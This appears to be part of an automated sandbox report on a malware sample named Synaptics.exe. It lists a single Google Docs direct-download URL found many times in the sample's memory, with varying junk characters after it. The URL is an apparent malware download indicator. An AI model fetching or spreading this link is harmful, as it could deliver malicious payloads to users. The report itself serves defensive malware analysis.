                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2994011286.000000001DA97000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3(
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3M
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3lss
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.000000000085C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2997458148.000000001DD14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                          Source: Synaptics.exe, 00000003.00000002.2938078109.000000000085C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4(z
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4NK
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.000000000085C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5/
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5c
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5~
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E73E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download64
                          Source: Synaptics.exe, 00000003.00000002.2938078109.000000000085C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download67:7
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6Cd
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6L
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.000000000085C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                          Source: Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7~
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2997458148.000000001DD14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                          Source: Synaptics.exe, 00000003.00000002.2957759712.000000000E6C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download81
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8M
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9N
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9a
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:/
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:11:~
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download::
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:Ax
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.000000000085C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2994011286.000000001DA97000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E73E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;L
                          Source: Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;paddN
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=.
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=t
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=v
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2994011286.000000001DA97000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?-
                          Source: Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?I
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2961258759.000000000E932000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAN
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAb
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                          Source: Synaptics.exe, 00000003.00000002.2957759712.000000000E6C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB-
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB/
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBB
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBtnR3
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2994011286.000000001DA97000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E73E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC:
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCL
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2997458148.000000001DD14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD1
                          Source: Synaptics.exe, 00000003.00000002.2938078109.000000000085C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD3H3
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDe
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDegw/
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDene
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDene)
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenet-
                          Source: Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDf
                          Source: Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD~
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE.
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadER_
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEc
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEt
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE~
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF4
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFC
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFO
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFr402A
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG-
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2997458148.000000001DD14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E73E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHL
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI7u
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIa
                          Source: Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIf
                          Source: Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI~
